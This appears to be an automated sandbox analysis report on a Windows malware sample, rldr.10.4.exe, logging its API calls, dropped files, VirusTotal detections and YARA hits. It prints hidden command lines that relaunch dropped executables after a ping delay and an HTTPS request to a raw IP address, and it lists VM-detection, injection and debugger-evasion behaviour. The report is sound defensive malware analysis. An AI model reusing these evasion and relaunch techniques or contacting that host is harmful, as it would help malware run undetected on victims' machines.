rldr.10.4.exe

Queries for the computername (4 events)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameA April 2, 2021, 10:35 a.m.	computer_name: TEST22-PC	1	1	0
GetComputerNameA April 2, 2021, 10:35 a.m.	computer_name: TEST22-PC	1	1	0
GetComputerNameA April 2, 2021, 10:44 a.m.	computer_name: TEST22-PC	1	1	0
GetComputerNameA April 2, 2021, 10:44 a.m.	computer_name: TEST22-PC	1	1	0

This executable has a PDB path (1 event)

pdb_path

k:\async-socket-win32-demo\x64\Release\AsyncSocket.pdb

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 2, 2021, 10:35 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

Connection to IP address

suspicious_request

GET https://34.212.193.150/kenichi/aura20b/zero21

Performs some HTTP requests (1 event)

request

GET https://34.212.193.150/kenichi/aura20b/zero21

Allocates read-write-execute memory (usually to unpack itself) (6 events)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory April 2, 2021, 10:35 a.m.	process_identifier: 1016 region_size: 139264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000001c10000 allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE) process_handle: 0xffffffffffffffff	1	0	0
NtAllocateVirtualMemory April 2, 2021, 10:35 a.m.	process_identifier: 1120 region_size: 139264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000001d10000 allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE) process_handle: 0xffffffffffffffff	1	0	0
NtAllocateVirtualMemory April 2, 2021, 10:44 a.m.	process_identifier: 2244 region_size: 139264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000001c10000 allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE) process_handle: 0xffffffffffffffff	1	0	0
NtAllocateVirtualMemory April 2, 2021, 10:44 a.m.	process_identifier: 2200 region_size: 139264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000001c10000 allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE) process_handle: 0xffffffffffffffff	1	0	0
NtProtectVirtualMemory April 2, 2021, 10:45 a.m.	process_identifier: 2200 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077219000 process_handle: 0xffffffffffffffff	1	0	0
NtProtectVirtualMemory April 2, 2021, 10:45 a.m.	process_identifier: 2200 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077218000 process_handle: 0xffffffffffffffff	1	0	0

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\RT4B706.exe

Creates hidden or system file (32 events)

Time & API	Arguments	Status	Return	Repeated
NtCreateFile April 2, 2021, 10:35 a.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x0000000018000018 filepath: C:\Users\test22\AppData\Roaming\Microsoft desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE) file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM) filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT) status_info: 4294967295 () share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)		-1073741771	0
NtCreateFile April 2, 2021, 10:35 a.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x0000000018000018 filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE) file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM) filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT) status_info: 4294967295 () share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)		-1073741771	0
NtCreateFile April 2, 2021, 10:35 a.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x0000000018000018 filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE) file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM) filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT) status_info: 4294967295 () share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)		-1073741771	0
NtCreateFile April 2, 2021, 10:35 a.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x0000000018000018 filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3832866432-4053218753-3017428901-1001 desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE) file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM) filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3832866432-4053218753-3017428901-1001 create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT) status_info: 4294967295 () share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)		-1073741771	0
NtCreateFile April 2, 2021, 10:35 a.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x000000001e00001e filepath: C:\Users\test22\AppData\Roaming\Microsoft desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE) file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM) filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT) status_info: 4294967295 () share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)		-1073741771	0
NtCreateFile April 2, 2021, 10:35 a.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x000000001e00001e filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE) file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM) filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT) status_info: 4294967295 () share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)		-1073741771	0
NtCreateFile April 2, 2021, 10:35 a.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x000000001e00001e filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE) file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM) filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT) status_info: 4294967295 () share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)		-1073741771	0
NtCreateFile April 2, 2021, 10:35 a.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x000000001e00001e filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3832866432-4053218753-3017428901-1001 desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE) file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM) filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3832866432-4053218753-3017428901-1001 create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT) status_info: 4294967295 () share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)		-1073741771	0
NtCreateFile April 2, 2021, 10:35 a.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x0000000041000041 filepath: C:\Users\test22\AppData\Roaming\Microsoft desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE) file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM) filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT) status_info: 4294967295 () share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)		-1073741771	0
NtCreateFile April 2, 2021, 10:35 a.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x0000000041000041 filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE) file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM) filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT) status_info: 4294967295 () share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)		-1073741771	0
NtCreateFile April 2, 2021, 10:35 a.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x0000000041000041 filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE) file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM) filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT) status_info: 4294967295 () share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)		-1073741771	0
NtCreateFile April 2, 2021, 10:35 a.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x0000000041000041 filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3832866432-4053218753-3017428901-1001 desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE) file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM) filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3832866432-4053218753-3017428901-1001 create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT) status_info: 4294967295 () share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)		-1073741771	0
NtCreateFile April 2, 2021, 10:35 a.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x0000000041000041 filepath: C:\Users\test22\AppData\Roaming\Microsoft desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE) file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM) filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT) status_info: 4294967295 () share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)		-1073741771	0
NtCreateFile April 2, 2021, 10:35 a.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x0000000041000041 filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE) file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM) filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT) status_info: 4294967295 () share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)		-1073741771	0
NtCreateFile April 2, 2021, 10:35 a.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x0000000041000041 filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE) file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM) filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT) status_info: 4294967295 () share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)		-1073741771	0
NtCreateFile April 2, 2021, 10:35 a.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x0000000041000041 filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3832866432-4053218753-3017428901-1001 desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE) file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM) filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3832866432-4053218753-3017428901-1001 create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT) status_info: 4294967295 () share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)		-1073741771	0
NtCreateFile April 2, 2021, 10:44 a.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x0000000041000041 filepath: C:\Users\test22\AppData\Roaming\Microsoft desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE) file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM) filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT) status_info: 4294967295 () share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)		-1073741771	0
NtCreateFile April 2, 2021, 10:44 a.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x0000000041000041 filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE) file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM) filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT) status_info: 4294967295 () share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)		-1073741771	0
NtCreateFile April 2, 2021, 10:44 a.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x0000000041000041 filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE) file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM) filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT) status_info: 4294967295 () share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)		-1073741771	0
NtCreateFile April 2, 2021, 10:44 a.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x0000000041000041 filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3832866432-4053218753-3017428901-1001 desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE) file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM) filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3832866432-4053218753-3017428901-1001 create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT) status_info: 4294967295 () share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)		-1073741771	0
NtCreateFile April 2, 2021, 10:44 a.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x0000000041000041 filepath: C:\Users\test22\AppData\Roaming\Microsoft desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE) file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM) filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT) status_info: 4294967295 () share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)		-1073741771	0
NtCreateFile April 2, 2021, 10:44 a.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x0000000041000041 filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE) file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM) filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT) status_info: 4294967295 () share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)		-1073741771	0
NtCreateFile April 2, 2021, 10:44 a.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x0000000041000041 filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE) file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM) filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT) status_info: 4294967295 () share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)		-1073741771	0
NtCreateFile April 2, 2021, 10:44 a.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x0000000041000041 filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3832866432-4053218753-3017428901-1001 desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE) file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM) filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3832866432-4053218753-3017428901-1001 create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT) status_info: 4294967295 () share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)		-1073741771	0
NtCreateFile April 2, 2021, 10:44 a.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x0000000041000041 filepath: C:\Users\test22\AppData\Roaming\Microsoft desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE) file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM) filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT) status_info: 4294967295 () share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)		-1073741771	0
NtCreateFile April 2, 2021, 10:44 a.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x0000000041000041 filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE) file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM) filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT) status_info: 4294967295 () share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)		-1073741771	0
NtCreateFile April 2, 2021, 10:44 a.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x0000000041000041 filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE) file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM) filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT) status_info: 4294967295 () share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)		-1073741771	0
NtCreateFile April 2, 2021, 10:44 a.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x0000000041000041 filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3832866432-4053218753-3017428901-1001 desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE) file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM) filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3832866432-4053218753-3017428901-1001 create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT) status_info: 4294967295 () share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)		-1073741771	0
NtCreateFile April 2, 2021, 10:44 a.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x0000000041000041 filepath: C:\Users\test22\AppData\Roaming\Microsoft desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE) file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM) filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT) status_info: 4294967295 () share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)		-1073741771	0
NtCreateFile April 2, 2021, 10:44 a.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x0000000041000041 filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE) file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM) filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT) status_info: 4294967295 () share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)		-1073741771	0
NtCreateFile April 2, 2021, 10:44 a.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x0000000041000041 filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE) file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM) filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT) status_info: 4294967295 () share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)		-1073741771	0
NtCreateFile April 2, 2021, 10:44 a.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x0000000041000041 filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3832866432-4053218753-3017428901-1001 desired_access: 0x00100001 (FILE_READ_DATA|FILE_LIST_DIRECTORY|SYNCHRONIZE) file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM) filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3832866432-4053218753-3017428901-1001 create_options: 16417 (FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_OPEN_FOR_BACKUP_INTENT) status_info: 4294967295 () share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)		-1073741771	0

Creates a suspicious process (1 event)

cmdline

cmd.exe

A process created a hidden window (3 events)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW April 2, 2021, 10:35 a.m.	thread_identifier: 1160 thread_handle: 0x00000000000000ec process_identifier: 1756 current_directory: filepath: track: 1 command_line: cmd /c ping 8.8.7.7 -n 2 & start C:\Users\test22\AppData\Local\Temp\rldr.10.4.exe VVWDQI5 filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000000000000f0	1	1	0
CreateProcessInternalW April 2, 2021, 10:36 a.m.	thread_identifier: 2564 thread_handle: 0x00000000000000c4 process_identifier: 1572 current_directory: filepath: track: 1 command_line: cmd /c ping 8.8.7.7 -n 2 & start C:\Users\test22\AppData\Local\Temp\RT4B706.exe NHXU1K filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000000000000ec	1	1	0
CreateProcessInternalW April 2, 2021, 10:44 a.m.	thread_identifier: 804 thread_handle: 0x00000000000000ec process_identifier: 2364 current_directory: filepath: track: 1 command_line: cmd /c ping 8.8.7.7 -n 2 & start C:\Users\test22\AppData\Local\Temp\rT4B706.exe NICE filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000000000000f0	1	1	0

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (3 events)

Time & API	Arguments	Status	Return	Repeated
Process32NextW April 2, 2021, 10:35 a.m.	snapshot_handle: 0x00000000000000e4 process_name: mobsync.exe process_identifier: 2060	1	1	0
Process32NextW April 2, 2021, 10:35 a.m.	snapshot_handle: 0x00000000000000e4 process_name: taskhost.exe process_identifier: 2420	1	1	0
Process32NextW April 2, 2021, 10:35 a.m.	snapshot_handle: 0x00000000000000e4 process_name: rldr.10.4.exe process_identifier: 1016	1	1	0

File has been identified by 6 AntiVirus engines on VirusTotal as malicious (6 events)

Elastic	malicious (high confidence)
Kaspersky	UDS:DangerousObject.Multi.Generic
Paloalto	generic.ml
FireEye	Generic.mg.81e6dcf2510ffc24
Kingsoft	Win32.Hack.Undef.(kcloud)
Cynet	Malicious (score: 90)

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory April 2, 2021, 10:35 a.m.	process_identifier: 1016 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 122880 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x0000000002541000 process_handle: 0xffffffffffffffff	1	0	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section	{u'size_of_data': u'0x0002e200', u'virtual_address': u'0x00026000', u'entropy': 7.457193510757247, u'name': u'.rsrc', u'virtual_size': u'0x0002e138'}				entropy	7.45719351076				description	A section with a high entropy has been found
entropy	0.585714285714				description	Overall entropy of this PE file is high

Yara rule detected in process memory (13 events)

description	Code injection with CreateRemoteThread in a remote process				rule	inject_thread
description	Create a windows service				rule	create_service
description	Code injection with CreateRemoteThread in a remote process				rule	inject_thread
description	Create a windows service				rule	create_service
description	Code injection with CreateRemoteThread in a remote process				rule	inject_thread
description	Create a windows service				rule	create_service
description	(no description)				rule	DebuggerCheck__GlobalFlags
description	(no description)				rule	DebuggerCheck__QueryInfo
description	(no description)				rule	DebuggerHiding__Thread
description	(no description)				rule	DebuggerHiding__Active
description	(no description)				rule	ThreadControl__Context
description	(no description)				rule	SEH__vectored
description	Bypass DEP				rule	disable_dep

Uses Windows utilities for basic Windows functionality (4 events)

cmdline	ping 8.8.7.7 -n 2
cmdline	cmd /c ping 8.8.7.7 -n 2 & start C:\Users\test22\AppData\Local\Temp\rldr.10.4.exe VVWDQI5
cmdline	cmd /c ping 8.8.7.7 -n 2 & start C:\Users\test22\AppData\Local\Temp\rT4B706.exe NICE
cmdline	cmd /c ping 8.8.7.7 -n 2 & start C:\Users\test22\AppData\Local\Temp\RT4B706.exe NHXU1K

